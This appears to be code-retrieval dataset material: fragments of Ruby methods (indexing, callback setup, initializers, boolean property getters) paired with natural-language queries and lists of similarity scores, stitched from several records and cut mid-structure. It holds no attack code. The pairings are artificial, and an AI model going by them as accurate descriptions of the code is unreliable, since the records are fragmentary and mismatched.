"def initialize(io, index_file=false)\n @io = io\n index_filename = \n case index_file\n when String then index_file\n when TrueClass then Dat::Index.index_filename(io.path)\n else\n nil\n end\n @index = Index.new\n if index_filename && File.exist?(index_filename)\n @index.from_byteindex!(index_filename)\n else\n @index.from_io!(@io)\n end\n\n if index_filename && !File.exist?(index_filename)\n @index.write(index_filename)\n end\n end",
"def set_index\n @index = Nokogiri::HTML(open(@url))\n end",
"def get_index\n # url = \"http://marketdata.set.or.th/mkt/marketsummary.do?language=th&country=TH\"\n # file = File.open('tmp/sample_index.html','w') do |f|\n # f.binmode\n # f << open(url).read\n # end\n file_name= 'tmp/sample_index.html'\n f = File.read(file_name)\n doc = Nokogiri::HTML(f)\n set_index = doc.css('tr:nth-child(8) td')[1].text\n render :text => string2f(set_index)\n end",
"def index_document(opts = {})\n params = document_path(opts)\n params[:body] = as_indexed_json\n es_client.index params\n end",
"def require_index(name); end",
"def require_index(name); end",
"def test_index\n Index.generate(TEST_FILE, index_filename)\n index = Index.new(TEST_FILE, index_filename)\n\n TEST_LINES.size.times do |i|\n assert_equal TEST_LINES[i], index[i]\n end\n\n assert_nil index[TEST_LINES.size]\n assert_nil index[7000]\n # Make sure random access works too\n assert_equal TEST_LINES[3], index[3]\n end",
"def get_index_from_gh # rubocop:disable Metrics/MethodLength, Metrics/AbcSize\n resp = Zip::InputStream.new URI(\"#{Hit::GHURL}index.zip\").open\n zip = resp.get_next_entry\n yaml = zip.get_input_stream.read\n index = RelatonBib.parse_yaml yaml, [Symbol]\n File.write path, index.to_yaml, encoding: \"UTF-8\"\n index\n end",
"def exec_index\n begin\n require 'fastri/version'\n fastri = true\n rescue LoadError\n fastri = false\n end\n if fastri\n if no_harm?\n $stderr.puts \"fastri-server -b\"\n else\n system \"fastri-server -b\"\n end\n else\n case config.installdirs\n when 'std'\n output = \"--ri-system\"\n when 'site'\n output = \"--ri-site\"\n when 'home'\n output = \"--ri\"\n else\n abort \"bad config: sould not be possible -- installdirs = #{config.installdirs}\"\n end\n\n if File.exist?('.document')\n files = File.read('.document').split(\"\\n\")\n files.reject!{ |l| l =~ /^\\s*[#]/ || l !~ /\\S/ }\n files.collect!{ |f| f.strip }\n else\n files = [\"lib\", \"ext\"]\n end\n\n opt = []\n opt << \"-U\"\n opt << output\n opt << files\n opt = opt.flatten\n\n if no_harm?\n puts \"rdoc #{opt.join(' ').strip}\"\n else\n #sh \"rdoc #{opt.join(' ').strip}\"\n require 'rdoc/rdoc'\n ::RDoc::RDoc.new.document(opt)\n end\n end\n end",
"def do_local_indexing(solr_doc); end",
"def index\n @index ||= Crawler::Index.new(base_uri)\n end",
"def reindex!\n indexed if generate_solr_index\n end",
"def process_file(file_name)\n\tputs \"Processing File.... \"\n\n\tbegin\n\t\tIO.foreach(file_name) do |line|\n\t\t\t# Pull title out of text line\n\t\t\ttitle = cleanup_title(line)\n\n\t\t\tif not title.nil?\n\t\t\t # Split title into individual words\n\t\t\t words = title.split(\" \")\n\n\t\t\t\t# Remove stop words\n\t\t\t\tstop_words = ['a', 'an', 'and', 'by', 'for', 'from', 'in', 'of', 'on',\n\t\t\t\t\t 'or', 'out', 'the', 'to', 'with']\n\n\t\t\t\tfor i in 0..stop_words.length-1\n\t\t\t\t\twords.delete(stop_words[i])\n\t\t\t\tend\n\n\t\t\t\t# Count subsequent words\n\t\t\t\tfor i in 0..words.length-2\n\t\t\t\t\t$bigrams[words[i]][words[i+1]] += 1\n\t\t\t\tend\n\t\t\tend\n\tend\n\n\t\tputs \"Finished. Bigram model built.\\n\"\n\trescue\n\t\tSTDERR.puts \"Could not open file\"\n\t\texit 4\n\tend\nend",
"def index\n @@index ||= Ferret::Index::Index.new(default_index_params)\n end",
"def index\n @@index ||= Ferret::Index::Index.new(default_index_params)\n end",
"def index\n return patterned_index if params[:pattern].present?\n\n index_full\n end"
] | [
"0.7740468",
"0.7514854",
"0.73784924",
"0.71144867",
"0.7050467",
"0.6907303",
"0.6863395",
"0.6611522",
"0.65240586",
"0.65150326",
"0.6402281",
"0.6384633",
"0.6300359",
"0.62951237",
"0.62905693",
"0.6271485",
"0.6251466",
"0.62455493",
"0.6238742",
"0.6229582",
"0.6223811",
"0.61953807",
"0.6106859",
"0.610441",
"0.608467",
"0.6083383",
"0.60495365",
"0.6040124",
"0.6035305",
"0.6021565",
"0.60122204",
"0.600237",
"0.59869474",
"0.59827566",
"0.5974043",
"0.59631896",
"0.59273547",
"0.59268034",
"0.59221476",
"0.5915624",
"0.58821756",
"0.58762306",
"0.5872544",
"0.58424395",
"0.5827599",
"0.58011365",
"0.57617265",
"0.5751028",
"0.5749035",
"0.5748759",
"0.5745864",
"0.57456213",
"0.57415354",
"0.5739278",
"0.5735321",
"0.5729332",
"0.57280684",
"0.5724711",
"0.5720928",
"0.56960523",
"0.5679224",
"0.5663089",
"0.5657058",
"0.5628271",
"0.5610415",
"0.5596392",
"0.5585373",
"0.5584891",
"0.55838525",
"0.55805063",
"0.55747104",
"0.5571857",
"0.5562909",
"0.5548156",
"0.55458575",
"0.55456847",
"0.5544563",
"0.5539684",
"0.5537329",
"0.55216545",
"0.5508606",
"0.55029964",
"0.5502032",
"0.5499458",
"0.5493884",
"0.54922396",
"0.5479033",
"0.5478143",
"0.54731786",
"0.54731786",
"0.54661965",
"0.5463493",
"0.5461259",
"0.54514796",
"0.5441439",
"0.54397374",
"0.5434998",
"0.543118",
"0.543118",
"0.54295737"
] | 0.7027357 | 5 |
Use callbacks to share common setup or constraints between actions. | def set_item
@item = @klass.where(team_id: params[:team_id]).find(params[:id])
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def set_required_actions\n # TODO: check what fields change to asign required fields\n end",
"def action_hook; end",
"def run_actions; end",
"def define_action_hook; end",
"def actions; end",
"def define_action_helpers\n if super && action == :save\n @instance_helper_module.class_eval do\n define_method(:valid?) do |*args|\n self.class.state_machines.fire_event_attributes(self, :save, false) { super(*args) }\n end\n end\n end\n end",
"def add_actions; end",
"def callbacks; end",
"def callbacks; end",
"def setup *actions, &proc\n (@setup_procs ||= []) << [proc, actions.size > 0 ? actions : [:*]]\n end",
"def define_action_helpers; end",
"def post_setup\n end",
"def action_methods; end",
"def action_methods; end",
"def action_methods; end",
"def before_setup; end",
"def action_run\n end",
"def execute(setup)\n @action.call(setup)\n end",
"def define_action_helpers?; end",
"def set_actions\n actions :all\n end",
"def action_done(action)\n dispatch = { :migrate => :done_migrating, :map => :done_mapping, :reduce =>\n :done_reducing, :finalize => :done_finalizing } \n self.send dispatch[action[:action]], action\n end",
"def dependencies action, &block\n @actions.each do |other|\n if action[:requires].include? other[:provide]\n block.call other\n end\n end\n end",
"def setup!\n return unless @setup_procs\n http_actions = actions\n @setup_procs.each do |setup_proc|\n proc, actions = setup_proc\n @setup__actions = actions.map do |action|\n\n action.is_a?(Regexp) ?\n http_actions.select { |a| a.to_s =~ action } :\n action.is_a?(String) && action =~ /\\A\\./ ?\n http_actions.map { |a| a.to_s << action if format?(a).include?(action) }.compact :\n action\n\n end.flatten\n self.class_exec &proc\n @setup__actions = nil\n end\n @setup_procs = nil\n end",
"def before_actions(*logic)\n self.before_actions = logic\n end",
"def setup_handler\n end",
"def set_action(opts)\n opts = check_params(opts,[:actions])\n super(opts)\n end",
"def setup(action)\n @targets.clear\n unless action.item.target_filters.empty?\n @targets = SES::TargetManager.make_targets(action)\n else\n item = action.item\n if item.for_opponent?\n @targets = $game_troop.alive_members\n elsif item.for_dead_friend?\n @targets = $game_party.battle_members.select { |actor| actor.dead? }\n else\n $game_party.battle_members.select { |actor| actor.alive? }\n end\n end\n @item_max = @targets.size\n create_contents\n refresh\n show\n activate\n end",
"def action; end",
"def action; end",
"def action; end",
"def action; end",
"def action; end",
"def workflow\n end",
"def revisable_shared_setup(args, block)\n class << self\n attr_accessor :revisable_options\n end\n options = args.extract_options!\n self.revisable_options = Options.new(options, &block)\n \n self.send(:include, Common)\n self.send(:extend, Validations) unless self.revisable_options.no_validation_scoping?\n self.send(:include, WithoutScope::QuotedColumnConditions)\n end",
"def setup\n @action = SampleActionAndroid.new(os_name: 'android',\n app_name: APP_PATH)\n end",
"def before(action)\n invoke_callbacks *self.class.send(action).before\n end",
"def process_action(...)\n send_action(...)\n end",
"def before_dispatch(env); end",
"def after_actions(*logic)\n self.after_actions = logic\n end",
"def setup\n # override and do something appropriate\n end",
"def setup(client)\n return unless @setup\n actions = @setup['setup'].select { |action| action['do'] }.map { |action| Action.new(action['do']) }\n actions.each do |action|\n action.execute(client)\n end\n self\n end",
"def setup(_context)\n end",
"def setup(resources) ; end",
"def validate_actions\n errors.add(:base, :should_give_at_least_one_action) if !manage? && !forecasting? && !read? && !api?\n end",
"def setup\n @resource_config = {\n :callbacks => {\n :before_create => nil,\n :after_create => nil,\n :before_update => nil,\n :after_update => nil,\n :before_destroy => nil,\n :after_destroy => nil,\n },\n :child_assoc => nil,\n :model => nil,\n :parent => nil,\n :path => nil,\n :permission => {},\n :properties => {},\n :relation => {\n :create => nil,\n :delete => nil,\n },\n :roles => nil,\n }\n end",
"def determine_valid_action\n\n end",
"def process_shared\n handle_taxes\n handle_shippings\n create_adjustments_from_params\n handle_status\n handle_inventory_refunds\n handle_payment_transactions\n order.updater.update\n end",
"def startcompany(action)\n @done = true\n action.setup\n end",
"def init_actions\n am = action_manager()\n am.add_action(Action.new(\"&Disable selection\") { @selection_mode = :none; unbind_key(32); bind_key(32, :scroll_forward); } )\n am.add_action(Action.new(\"&Edit Toggle\") { @edit_toggle = !@edit_toggle; $status_message.value = \"Edit toggle is #{@edit_toggle}\" })\n end",
"def event_callbacks(event, metadata={})\n case event\n when :reset, :review\n if confirmed\n update_attributes(confirmed: false)\n end\n when :confirm\n confirm\n # trigger :order for all applicable items\n # NOTE: :order event is common to both physical and digital items\n items.each do |i|\n if i.event_permitted(:order)\n user_id = last_transition.user_id\n i.trigger!(:order, { order_id: id, user_id: user_id })\n end\n end\n when :complete_work\n request = metadata[:request]\n work_complete_notification(request)\n when :close\n close\n end\n if event != :close && !open\n reopen\n end\n end",
"def setup_action\n return unless PONY::ERRNO::check_sequence(current_act)\n new_sequence = @action_sequence[@sequence_index+1...@action_sequence.size]\n @sequence_index = 0\n new_sequence = DND::SkillSequence::ACTS[@acts[1]] + new_sequence\n execute_sequence\n end",
"def define_tasks\n define_weave_task\n connect_common_tasks\n end",
"def setup(&block)\n define_method(:setup, &block)\n end",
"def setup\n transition_to(:setup)\n end",
"def setup\n transition_to(:setup)\n end",
"def action\n end",
"def setup( *args )\n\t\t\tself.class.setupBlocks.each {|sblock|\n\t\t\t\tdebugMsg \"Calling setup block method #{sblock}\"\n\t\t\t\tself.send( sblock )\n\t\t\t}\n\t\t\tsuper( *args )\n\t\tend",
"def config(action, *args); end",
"def setup\n @setup_proc.call(self) if @setup_proc\n end",
"def before_action \n end",
"def setup_callbacks\n defined_callbacks.each do |meth|\n unless respond_to?(\"call_#{meth}_callbacks\".to_sym)\n self.class.module_eval <<-EOE\n def call_#{meth}_callbacks(*args)\n plugin_store.each {|a| a.call_#{meth}_callbacks(*args) } if respond_to?(:plugin_store) && plugin_store\n self.send :#{meth}, *args if respond_to?(:#{meth})\n end\n EOE\n end\n end\n end",
"def action\n end",
"def matt_custom_action_begin(label); end",
"def setup\n # override this if needed\n end",
"def setup\n\t\t\t\t\t\t# Do nothing\n\t\t\t\tend",
"def setup\n\t\t\t\t\t\t# Do nothing\n\t\t\t\tend",
"def action(options,&callback)\n new_action = Action===options ? options : Action.new(options,&callback)\n # replace any with (shared name/alias or both default) + same arity\n @actions.delete_if do |existing_action|\n ((existing_action.names & new_action.names).size > 0 ||\n existing_action.default? && new_action.default?) &&\n existing_action.required.size == new_action.required.size &&\n existing_action.optional.size <= new_action.optional.size\n end\n @actions = (@actions + [new_action]).sort\n new_action\n end",
"def set_target_and_action target, action\n self.target = target\n self.action = 'sugarcube_handle_action:'\n @sugarcube_action = action\n end",
"def after(action)\n invoke_callbacks *options_for(action).after\n end",
"def pre_task\n end",
"def setup(server)\n server.on('beforeMethod', method(:before_method), 10)\n end",
"def add_actions\n attribute = machine.attribute\n name = self.name\n \n owner_class.class_eval do\n define_method(name) {self.class.state_machines[attribute].events[name].fire(self)}\n define_method(\"#{name}!\") {self.class.state_machines[attribute].events[name].fire!(self)}\n define_method(\"can_#{name}?\") {self.class.state_machines[attribute].events[name].can_fire?(self)}\n end\n end",
"def init_actions\n @select_action = SelectAction.new\n @endpoint_mouse_action = EndpointMouseAction.new\n @move_action = MoveAction.new\n end",
"def setup_signals; end",
"def after_created\r\n return unless compile_time\r\n Array(action).each do |action|\r\n run_action(action)\r\n end\r\nend",
"def after_created\r\n return unless compile_time\r\n Array(action).each do |action|\r\n run_action(action)\r\n end\r\nend",
"def set_target_and_action target, action\n self.target = target\n self.action = 'sugarcube_handle_action:'\n @sugarcube_action = action.respond_to?('weak!') ? action.weak! : action\n end",
"def initialize(*args)\n super\n @action = :set\nend",
"def after_set_callback; end",
"def setup\n #implement in subclass;\n end",
"def lookup_action; end",
"def setup &block\n if block_given?\n @setup = block\n else\n @setup.call\n end\n end",
"def setup_action\n return TSBS.error(@acts[0], 1, @used_sequence) if @acts.size < 2\n actions = TSBS::AnimLoop[@acts[1]]\n if actions.nil?\n show_action_error(@acts[1])\n end\n @sequence_stack.push(@acts[1])\n @used_sequence = @acts[1]\n actions.each do |acts|\n @acts = acts\n execute_sequence\n break if @break_action\n end\n @sequence_stack.pop\n @used_sequence = @sequence_stack[-1]\n end",
"def release_actions; end",
"def around_hooks; end",
"def save_action; end",
"def setup(easy)\n super\n easy.customrequest = @verb\n end",
"def action_target()\n \n end",
"def setup\n callback(:setup) do\n notify(:setup)\n migration_check.last_deployed_commit\n end\n end",
"def setup\n return unless @setup\n\n actions = @setup['setup'].select { |action| action['do'] }.map { |action| Action.new(action['do']) }\n run_actions_and_retry(actions)\n self\n end",
"def before_setup\n # do nothing by default\n end",
"def my_actions(options)\n @setup = false\n get_template_part(\"custom_used\",\"action_users\",true)\n end",
"def default_action; end",
"def setup(&blk)\n @setup_block = blk\n end",
"def callback_phase\n super\n end",
"def advice\n end",
"def _handle_action_missing(*args); end",
"def duas1(action)\n action.call\n action.call\nend",
"def shared_action(name, &block)\n @controller.shared_actions[name] = block\n end",
"def before_action action, &block\n @audience[:before][action] ||= Set.new\n @audience[:before][action] << block\n end",
"def setup_initial_state\n\n state_a = State.new(\"a\", 0)\n state_b = State.new(\"b\", 0)\n state_c = State.new(\"c\", 10)\n\n move_to_b = Action.new(\"move_to_b\", 1, state_b)\n\n move_to_c = Action.new(\"move_to_c\", 1, state_c)\n\n state_a.actions = [move_to_b, move_to_c]\n\n return state_a\n \nend"
] | [
"0.6163163",
"0.6045976",
"0.5946146",
"0.591683",
"0.5890051",
"0.58349305",
"0.5776858",
"0.5703237",
"0.5703237",
"0.5652805",
"0.5621621",
"0.54210985",
"0.5411113",
"0.5411113",
"0.5411113",
"0.5391541",
"0.53794575",
"0.5357573",
"0.53402257",
"0.53394014",
"0.53321576",
"0.53124547",
"0.529654",
"0.5296262",
"0.52952296",
"0.52600986",
"0.52442724",
"0.52385926",
"0.52385926",
"0.52385926",
"0.52385926",
"0.52385926",
"0.5232394",
"0.523231",
"0.5227454",
"0.52226824",
"0.52201617",
"0.5212327",
"0.52079266",
"0.52050185",
"0.51754695",
"0.51726824",
"0.51710224",
"0.5166172",
"0.5159343",
"0.51578903",
"0.51522785",
"0.5152022",
"0.51518047",
"0.51456624",
"0.51398855",
"0.5133759",
"0.5112076",
"0.5111866",
"0.5111866",
"0.5110294",
"0.5106169",
"0.509231",
"0.50873137",
"0.5081088",
"0.508059",
"0.50677156",
"0.50562143",
"0.5050554",
"0.50474834",
"0.50474834",
"0.5036181",
"0.5026331",
"0.5022976",
"0.5015441",
"0.50121695",
"0.5000944",
"0.5000019",
"0.4996878",
"0.4989888",
"0.4989888",
"0.49864885",
"0.49797225",
"0.49785787",
"0.4976161",
"0.49683493",
"0.4965126",
"0.4958034",
"0.49559742",
"0.4954353",
"0.49535993",
"0.4952725",
"0.49467874",
"0.49423352",
"0.49325448",
"0.49282882",
"0.49269363",
"0.49269104",
"0.49252945",
"0.4923091",
"0.49194667",
"0.49174926",
"0.49173003",
"0.49171105",
"0.4915879",
"0.49155936"
] | 0.0 | -1 |
Initialises a new Aspire::Object instance | def initialize(uri, factory)
self.factory = factory
# Normalise the URL to the linked data form
self.uri = factory ? factory.cache.linked_data_url(uri) : uri
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def initialize(obj); end",
"def initialize object\n\t\tself.object = object\n\tend",
"def initialize\n initialize!\n end",
"def initialize\n initialize!\n end",
"def initialize() end",
"def initialize(object, response = nil)\n @object = object\n\n @end_date = object['end_date']\n @id = object['id']\n @jurisdiction = object['jurisdiction']\n @percentage = object['percentage']\n @start_date = object['start_date']\n @type = object['type']\n @response = response\n end",
"def initialize(object)\n @object = object\n end",
"def initialize(object)\n @object = object\n end",
"def initialize(object)\n @object = object\n end",
"def initialize(object)\n @object = object\n end",
"def initialize()\n end",
"def initialize\n @params_class = Spree::Adyen::HPP::Params\n @invoice_class = Spree::Adyen::Invoice\n end",
"def initialize(obj)\n @obj = obj\n end",
"def initialize(obj)\n @obj = obj\n end",
"def initialize(object)\n @id = object[\"id\"]\n @firstName = object[\"firstName\"]\n @lastName = object[\"lastName\"]\n @email = object[\"email\"]\n @phone = object[\"phone\"]\n @type = object[\"type\"]\n end",
"def initialize\n init\n end",
"def new\n @apex_class = ApexClass.new\n @apex_class_body = ''\n end",
"def initialize(object, response = nil)\n @object = object\n\n @amount = object['amount']\n @arrival_date = object['arrival_date']\n @created_at = object['created_at']\n @currency = object['currency']\n @deducted_fees = object['deducted_fees']\n @id = object['id']\n @links = object['links']\n @reference = object['reference']\n @status = object['status']\n @response = response\n end",
"def initialize(obj)\n __setobj__(obj)\n end",
"def initialize(obj)\n @base = obj\n end",
"def instantiate\n resource.new(data)\n end",
"def initialize\n \n end",
"def initialize(maker, sirens)\n super(maker)\n @sirens = sirens\n end",
"def initialize()\n end",
"def initialize()\n end",
"def initialize()\n end",
"def initialize()\n end",
"def initialize()\n end",
"def initialize()\n end",
"def initialize()\n end",
"def initialize()\n end",
"def initialize()\n\t\tend",
"def initialize(api_obj)\n @api_obj = api_obj\n end",
"def initialize\n\t\t\n\t\t@dao = DAO.new 'rpg'\n\n\tend",
"def new()\n #This is a stub, used for indexing\n end",
"def initialize(object, response = nil)\n @object = object\n\n @actions = object['actions']\n @created_at = object['created_at']\n @fallback_enabled = object['fallback_enabled']\n @id = object['id']\n @links = object['links']\n @mandate_request = object['mandate_request']\n @metadata = object['metadata']\n @payment_request = object['payment_request']\n @purpose_code = object['purpose_code']\n @resources = object['resources']\n @status = object['status']\n @response = response\n end",
"def initialize(*) end",
"def initialize(*) end",
"def initialize(*) end",
"def initialize(*) end",
"def initialize(*) end",
"def initialize( uri, idobj )\n\t\t@data\t\t= {}\n\t\t@id\t\t\t= idobj\n\t\t@new\t\t= true\n\t\t@modified\t= false\n\n\t\tunless idobj.new?\n\t\t\tself.retrieve\n\t\tend\n\n\t\tsuper()\n\tend",
"def initialize(object = nil)\n self.object = object if object\n end",
"def initialize()\n\t\t######## Members\n\t\t##\n\t\t# Package name\n\t\t# \n\t\t# @var\tstring\n\t\t##\n\t\t@package = 'Sifter'\n\n\t\t##\n\t\t# Holds child objects\n\t\t# \n\t\t# @var\tobject\n\t\t##\n\t\t@contents = nil\n\n\t\t##\n\t\t# Capture result flag\n\t\t# \n\t\t# @var\tbool\n\t\t##\n\t\t@capture_result = false\n\n\t\t##\n\t\t# Result\n\t\t# \n\t\t# @var\tstring\n\t\t##\n\t\t@result = ''\n\n\t\t##\n\t\t# Holds replacements\n\t\t# \n\t\t# @var\tarray\n\t\t##\n\t\t@replace_vars = {}\n\tend",
"def initialize\n end",
"def initialize\n\t\t\n\tend",
"def initialize\r\n\r\n end",
"def initialize\n end",
"def initialize\n end",
"def initialize\n end",
"def initialize\n end",
"def initialize\n end",
"def initialize\n end",
"def initialize\n end",
"def initialize\n end",
"def initialize\n end",
"def initialize\n\n\tend",
"def initialize\n\n\tend",
"def initialize(object)\n @id = object[\"id\"]\n @data = object[\"data\"]\n end",
"def initialize\n end",
"def constructor; end",
"def initialize; end",
"def initialize; end",
"def initialize; end",
"def initialize; end",
"def initialize; end",
"def initialize; end",
"def initialize; end",
"def initialize; end",
"def initialize; end",
"def initialize; end",
"def initialize; end",
"def initialize\n super()\n end",
"def initialize\n super()\n end",
"def initialize\n super()\n end",
"def initialize\n super()\n end",
"def initialize\n super()\n end",
"def initialize\n super()\n end",
"def initialize\n super()\n end",
"def initialize(name)\n\t\t@client_name = name\n\t\t@object_builder = Rubbit_Object_Builder.instance(name)\n\t\t@rubbit_poster = Rubbit_Poster.instance(name)\n\t\t@me = nil\n\tend",
"def initialize(env)\n @traits = Class.new { include Attributes }.new( :waves => {} )\n @request = Rack::Request.new(env).freeze\n @response = Waves::Response.new( self )\n end",
"def initialize\n end",
"def initialize\n end",
"def initialize\n end",
"def initialize\n end",
"def initialize\n end",
"def initialize\n end",
"def initialize(*args)\n @body = nil\n @headers = {}\n @http_version = '1.1'\n\n super\n end",
"def initialize(path)\n\t\tself.path = path\n\t\tself.client = self.class.client\n\tend",
"def initialize(invoice, cache = File.join(Dir.pwd, 'farm'), log: Log::NULL,\n farmer: Farmers::Plain.new, lifetime: 24 * 60 * 60, strength: Score::STRENGTH)\n @log = log\n @cache = File.expand_path(cache)\n @invoice = invoice\n @pipeline = Queue.new\n @farmer = farmer\n @threads = ThreadPool.new('farm', log: log)\n @lifetime = lifetime\n @strength = strength\n end",
"def initialize(object, response = nil)\n @object = object\n\n @amount = object['amount']\n @count = object['count']\n @created_at = object['created_at']\n @currency = object['currency']\n @day_of_month = object['day_of_month']\n @end_date = object['end_date']\n @id = object['id']\n @interval = object['interval']\n @interval_unit = object['interval_unit']\n @links = object['links']\n @metadata = object['metadata']\n @month = object['month']\n @name = object['name']\n @payment_reference = object['payment_reference']\n @start_date = object['start_date']\n @status = object['status']\n @upcoming_payments = object['upcoming_payments']\n @response = response\n end",
"def initialize(object, response = nil)\n @object = object\n\n @authorisation_source = object['authorisation_source']\n @consent_parameters = object['consent_parameters']\n @created_at = object['created_at']\n @id = object['id']\n @links = object['links']\n @metadata = object['metadata']\n @next_possible_charge_date = object['next_possible_charge_date']\n @payments_require_approval = object['payments_require_approval']\n @reference = object['reference']\n @scheme = object['scheme']\n @status = object['status']\n @verified_at = object['verified_at']\n @response = response\n end",
"def initialize()\r\n\r\n end",
"def initialize(payload); end",
"def initialize(*args)\n # First form is used by JiakResource.get and JiakResource.query\n @jiak = Struct.new(:object,:auto_update).new\n if(args.size == 1 && args[0].is_a?(JiakObject))\n @jiak.object = args[0]\n else\n bucket = self.class.jiak.bucket\n @jiak.object = JiakObject.new(:bucket => bucket,\n :data => bucket.data_class.new(*args))\n if(self.class.auto_post?)\n if(!@jiak.object.key.empty? && self.class.exist?(@jiak.object.key))\n raise(JiakResourceException,\n \"auto-post failed: key='#{@jiak.object.key}' already exists.\")\n end\n self.class.post(self)\n end\n end\n end",
"def initialize()\n\t\t@url = \"http://lcboapi.com/products\"\n\t\t@id = 0\n\t\t@term = \"\"\n\t\t@result = []\n\t\t@single = {}\n\tend",
"def initialize(object)\n @item = object[\"item\"]\n end",
"def initialize(attrs)\n @name = attrs.fetch(:name)\n @engine = Engine.new(attrs.fetch(:max_speed), attrs.fetch(:max_jump_length), attrs.fetch(:max_fuel_amount))\n @navigator = Navigator.new(self, attrs.fetch(:map), attrs.fetch(:current_star_system))\n @cargo_bay = CargoBay.new\n end",
"def initialize(db)\n @db = db\n #initialize the scraper with a database\n end",
"def initialize(object)\n @id = object[\"id\"]\n @value = object[\"value\"]\n @type = object[\"type\"]\n end",
"def initialize(object)\n @id = object[\"id\"]\n @value = object[\"value\"]\n @type = object[\"type\"]\n end"
] | [
"0.6506553",
"0.64798385",
"0.64382607",
"0.64382607",
"0.63833064",
"0.6297461",
"0.6266121",
"0.62586266",
"0.62586266",
"0.62586266",
"0.62398475",
"0.6231504",
"0.61862123",
"0.61862123",
"0.6167852",
"0.6160523",
"0.61445075",
"0.6125816",
"0.61192876",
"0.6094196",
"0.608374",
"0.60783935",
"0.6075078",
"0.60744363",
"0.60744363",
"0.60744363",
"0.60744363",
"0.60744363",
"0.60744363",
"0.60744363",
"0.60744363",
"0.6058386",
"0.6053201",
"0.60495335",
"0.60493124",
"0.60351837",
"0.6028316",
"0.6028316",
"0.6028316",
"0.6028316",
"0.6028316",
"0.60192",
"0.6018719",
"0.600788",
"0.59974164",
"0.5990899",
"0.59876627",
"0.5985729",
"0.5985729",
"0.5985729",
"0.5985729",
"0.5985729",
"0.5985729",
"0.5985729",
"0.5985729",
"0.5985729",
"0.5985198",
"0.5985198",
"0.59744936",
"0.5966495",
"0.5961661",
"0.5960182",
"0.5960182",
"0.5960182",
"0.5960182",
"0.5960182",
"0.5960182",
"0.5960182",
"0.5960182",
"0.5960182",
"0.5960182",
"0.5960182",
"0.5949068",
"0.5949068",
"0.5949068",
"0.5949068",
"0.5949068",
"0.5949068",
"0.5949068",
"0.5946061",
"0.5944287",
"0.59407437",
"0.59407437",
"0.59407437",
"0.59407437",
"0.59407437",
"0.59407437",
"0.5928931",
"0.5927596",
"0.5923966",
"0.5919632",
"0.5912409",
"0.59002775",
"0.5893556",
"0.589182",
"0.5886879",
"0.5886088",
"0.58786076",
"0.58769864",
"0.58755094",
"0.58755094"
] | 0.0 | -1 |
Returns a Boolean property value | def get_boolean(property, data, single: true)
get_property(property, data, single: single) do |value, _type|
value ? true : false
end
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def bool_property(name)\n val = property(name)\n (val && val == 'true')\n end",
"def get_boolean_value\n\t\tend",
"def value\n true\n end",
"def value\n return @value unless @value.nil?\n @value = value_dec == :bool_value_true\n @value\n end",
"def get_boolean_value(field_name)\n\t\tend",
"def make_boolean_property(property, method)\n define_method(method) do\n if !self[property].nil?\n 'true' == self[property].downcase\n else\n false\n end\n end\n end",
"def value_if_true\n return @value_if_true\n end",
"def property?(name); end",
"def boolean\n Util.from_bytes :boolean, value\n end",
"def boolean_type\n 'Boolean'\n end",
"def to_bool() true end",
"def to_bool\n true\n end",
"def to_bool; self; end",
"def to_bool; self; end",
"def true?\n self.value == '1'\n end",
"def get_property(attribute)\n `var el=this.__native__,attr=attribute.__value__,key=c$Element.__keyed_attributes__[attr],bool=c$Element.__boolean_attributes__[attr]`\n `var value=key||bool?el[key||bool]:el.getAttribute(attr,2)`\n return `bool ? !!value : (value==null) ? nil : $q(value)`\n end",
"def boolean_value(object)\n\treturn object if object.is_a?(PRBool)\n\treturn PRBool.new(false) if object.is_a?(PRNil)\n\tif object.is_a?(PRNumber) then\n\t\treturn PRBool.new(object._value != 0)\n\tend\n\treturn PRBool.new(true)\nend",
"def is_propvalue?(); @type == GRT_PROPVALUE; end",
"def to_bool\n true\n end",
"def boolean(**props)\n transform(type: :boolean, **props) do |value|\n !!value\n end\n end",
"def true?\n self.value == '1'\n end",
"def literal_true\n BOOL_TRUE\n end",
"def boolean(value)\n value ? true : false\n end",
"def boolean\n map ->(primitive) { primitive.to_bool }\n end",
"def to_bool\n is_a?(::TrueClass) || self == :true || self == :yes || self == :on\n end",
"def attr_get_boolean(attr_type, strict = true)\n #This is a stub, used for indexing\n end",
"def typus_boolean(attribute = :default)\n options = read_model_config['fields']['options']\n\n boolean = if options && options['booleans'] && boolean = options['booleans'][attribute.to_s]\n boolean.is_a?(String) ? boolean.extract_settings : boolean\n else\n [\"True\", \"False\"]\n end\n\n [[boolean.first, \"true\"], [boolean.last, \"false\"]]\n end",
"def boolean_attribute?(name) \n BOOLEAN_ATTRIBUTES.include?(name.to_s)\n end",
"def config_boolean_true?(boolean_field)\n data[boolean_field].to_i == 1\n end",
"def single_value?\n @single_value\n end",
"def is_boolean()\n res = super(context,self)\n return res\n end",
"def boolean_attributes\n @boolean_attributes\n end",
"def default_X__PROPERTY_BOOL__X\n config_get_default('X__RESOURCE_NAME__X', 'X__PROPERTY_BOOL__X')\n end",
"def true \n \"true\" \n end",
"def boolean?\n @type == :boolean\n end",
"def literal_true\n 'true'\n end",
"def true?\n self.eql?(true)\n end",
"def boolean?\n !@arg[:boolValue].nil?\n end",
"def checked?\n @value\n end",
"def test?\n value_for('test') == 'true'\n end",
"def boolean\n any(true, false)\n end",
"def value_type?\n @property.value_type?\n end",
"def value?\n return !self.flag?\n end",
"def to_boolean\n inner_html == 'true'\n end",
"def result\n val = value.sub(/^boolean-/, '')\n val.casecmp(\"true\").zero?\n end",
"def to_bool() false end",
"def read_bool; end",
"def get_boolean_field(field_name)\n\t\tend",
"def to_bool(value)\n ActiveModel::Type::Boolean.new.cast(value.to_s.strip)\n end",
"def value_if_false\n return @value_if_false\n end",
"def boolval \n\n\t$cst.add_branch(\"boolval\")\n\n\tmatch_token(\"T_BOOLEAN\", $tokens[$index])\n\t\n\t$cst.ascend\n\nend",
"def output_value(key)\n if self.class.boolean_attributes.include?(key)\n (@attributes[key] ? \"yes\" : \"no\")\n else\n @attributes[key]\n end\n end",
"def bool()\n val = _int32(\"bool\")\n\n case val\n when 0\n false\n when 1\n true\n else\n raise ArgumentError, \"Invalid value for bool: #{val}\"\n end\n end",
